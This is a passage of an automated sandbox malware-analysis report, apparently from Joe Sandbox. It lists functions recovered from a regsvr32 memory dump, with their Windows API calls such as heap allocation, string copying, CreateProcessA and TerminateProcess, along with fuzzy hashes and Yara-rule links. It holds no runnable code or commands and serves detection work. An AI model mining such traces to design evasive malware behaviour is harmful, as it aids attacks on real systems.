                • InterlockedExchange.KERNEL32(04BEE0E0,00000000), ref: 04BE2608
                • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 04BE2623
                • lstrcpy.KERNEL32(00000000,?), ref: 04BE264C
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BE266D
                  • Part of subcall function 04BD1D5B: SetEvent.KERNEL32(?,?,04BCCE97), ref: 04BD1D70
                  • Part of subcall function 04BD1D5B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,04BCCE97), ref: 04BD1D90
                  • Part of subcall function 04BD1D5B: CloseHandle.KERNEL32(00000000,?,04BCCE97), ref: 04BD1D99
                  • Part of subcall function 04BD1D5B: CloseHandle.KERNEL32(?,?,?,04BCCE97), ref: 04BD1DA3
                  • Part of subcall function 04BD1D5B: RtlEnterCriticalSection.NTDLL(?), ref: 04BD1DAB
                  • Part of subcall function 04BD1D5B: RtlLeaveCriticalSection.NTDLL(?), ref: 04BD1DC3
                  • Part of subcall function 04BD1D5B: CloseHandle.KERNEL32(?), ref: 04BD1DDF
                  • Part of subcall function 04BD1D5B: LocalFree.KERNEL32(?), ref: 04BD1DEA
                  • Part of subcall function 04BD1D5B: RtlDeleteCriticalSection.NTDLL(?), ref: 04BD1DF4
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                • String ID:
                • API String ID: 1103286547-0
                • Opcode ID: 4b6ed92d02e90b3490e36dff5cae2a02e8ed0560f2a2200be409a04c67c954b6
                • Instruction ID: 95def3625beaf5fb83b43bce408dcde4b63ca17add71b81348290fac46f5a96c
                • Opcode Fuzzy Hash: 4b6ed92d02e90b3490e36dff5cae2a02e8ed0560f2a2200be409a04c67c954b6
                • Instruction Fuzzy Hash: 82F0F431740211A7E6207A33BC0AF163F28EBC4720F0005A2F204AF192CB65EC05C770
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCAD65 Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,04BD983E,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 04BCAD6A
                • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04BCAD7F
                • wsprintfA.USER32 ref: 04BCAD9B
                  • Part of subcall function 04BE2BDD: memset.NTDLL ref: 04BE2BF2
                  • Part of subcall function 04BE2BDD: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 04BE2C2B
                  • Part of subcall function 04BE2BDD: wcstombs.NTDLL ref: 04BE2C35
                  • Part of subcall function 04BE2BDD: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 04BE2C66
                  • Part of subcall function 04BE2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BDFD2F), ref: 04BE2C92
                  • Part of subcall function 04BE2BDD: TerminateProcess.KERNEL32(?,000003E5), ref: 04BE2CA8
                  • Part of subcall function 04BE2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BDFD2F), ref: 04BE2CBC
                  • Part of subcall function 04BE2BDD: CloseHandle.KERNEL32(?), ref: 04BE2CEF
                  • Part of subcall function 04BE2BDD: CloseHandle.KERNEL32(?), ref: 04BE2CF4
                • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04BCADB7
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                • String ID:
                • API String ID: 1624158581-0
                • Opcode ID: f59cb0acda8e0b655c64780e372edf3f5660cb596b7c8662b9d20879b62f67ac
                • Instruction ID: 68973eac93a101c31d48a518f4cba54c5231159887716fc4a8bc9f7e844417d5
                • Opcode Fuzzy Hash: f59cb0acda8e0b655c64780e372edf3f5660cb596b7c8662b9d20879b62f67ac
                • Instruction Fuzzy Hash: 57F0E232600515BBD6216B3BFC09FAB7B6DDBC1B21F150166F801EB292D768DC059AB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE3655 Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(0624C0A0), ref: 04BE365E
                • Sleep.KERNEL32(0000000A), ref: 04BE3668
                • HeapFree.KERNEL32(00000000), ref: 04BE3696
                • RtlLeaveCriticalSection.NTDLL(0624C0A0), ref: 04BE36AB
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: 7ae93c0ca8af9c469399d3eca1d0a8fd5caca2ab721819997449e488390b02ad
                • Instruction ID: 4b93d82afcff71c94d8a787bebefc51992bcdfddcc71f8f35d31a688d7425d43
                • Opcode Fuzzy Hash: 7ae93c0ca8af9c469399d3eca1d0a8fd5caca2ab721819997449e488390b02ad
                • Instruction Fuzzy Hash: 13F0BC74204200DFEB08AB3AE88AE2977B4EBC9740B04809AF8029B351D738FC548A35
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDD7C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,?,?), ref: 04BDD80B
                • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 04BDD81D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memcpy
                • String ID: 0x
                • API String ID: 3510742995-3225541890
                • Opcode ID: 00d8baef54a5e4230130bc26209dd4668cc579f836633ee802b2153153aa227a
                • Instruction ID: 1a7530a949bee25c680610c150edd6f9642565db64e4a6cab3c331f88cc7f137
                • Opcode Fuzzy Hash: 00d8baef54a5e4230130bc26209dd4668cc579f836633ee802b2153153aa227a
                • Instruction Fuzzy Hash: BC017535A0050ABFDB01DF69C805AEEB7BDEB44340F0044A5E904E7150E7B5EA09C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC5E89 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 2fdc8b8ec5263ab08c97fb3e56e95521d069e90b101dd98ead3febb691c08dda
                • Instruction ID: d659cab81ce14a91e9a04e93eee3505a86a3f23826ef7f082d5d7c2df3f9e4ca
                • Opcode Fuzzy Hash: 2fdc8b8ec5263ab08c97fb3e56e95521d069e90b101dd98ead3febb691c08dda
                • Instruction Fuzzy Hash: 77218872601919BBDB349F60DCC096ABB29FF08304B0005ACEA4586C10D732F9B19B91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC7554 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04BCCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,04BC567E), ref: 04BC7560
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                  • Part of subcall function 04BE64E1: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04BC758E,00000000,00000001,00000001,?,?,04BCCB3C,00000000,00000000,74E48170,00000008,0000EA60), ref: 04BE64EF
                  • Part of subcall function 04BE64E1: StrChrA.SHLWAPI(?,0000003F,?,?,04BCCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,04BC567E,?,?), ref: 04BE64F9
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BCCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000), ref: 04BC75BE
                • lstrcpy.KERNEL32(00000000,74E48170), ref: 04BC75CE
                • lstrcpy.KERNEL32(00000000,00000000), ref: 04BC75DA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: ea4e83eb203a99b09cac8734bc8edc5633c14d342cb2104c9b20aee6a9d35187
                • Instruction ID: 3b5c66884ae79209940aa3fd5201fc9e1b64383e31737cbfae350e18944cfe4d
                • Opcode Fuzzy Hash: ea4e83eb203a99b09cac8734bc8edc5633c14d342cb2104c9b20aee6a9d35187
                • Instruction Fuzzy Hash: 1F21A272500216EFDB126F79C884EAF7FB8EF45294B048099FD059B201EB75EA008BF0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC1D12 Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(69B25F44,?,?,00000000,04BC357F,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 04BC1D23
                • lstrlen.KERNEL32(?,?,?,00000000,04BC357F,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 04BC1D28
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,04BC357F,00000000,?,?,00000000,69B25F44,?,?,?), ref: 04BC1D44
                • lstrcpy.KERNEL32(00000000,?), ref: 04BC1D62
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                • String ID:
                • API String ID: 1697500751-0
                • Opcode ID: c3ca6643cf667668516ff30a6ec3cfef66dcd0ef8e2da8321d2addd19cfc43b9
                • Instruction ID: b61f289b07a9cffa4a9bc38b7d7f25d7bf87d7ef1f9e172ea680b2d31dcd540f
                • Opcode Fuzzy Hash: c3ca6643cf667668516ff30a6ec3cfef66dcd0ef8e2da8321d2addd19cfc43b9
                • Instruction Fuzzy Hash: E8F0F6B7400B41FBD731AB6E9C88E1BBB99EFC5311B04459AE94493111D735E414DFB1
                Uniqueness

                Uniqueness Score: -1.00%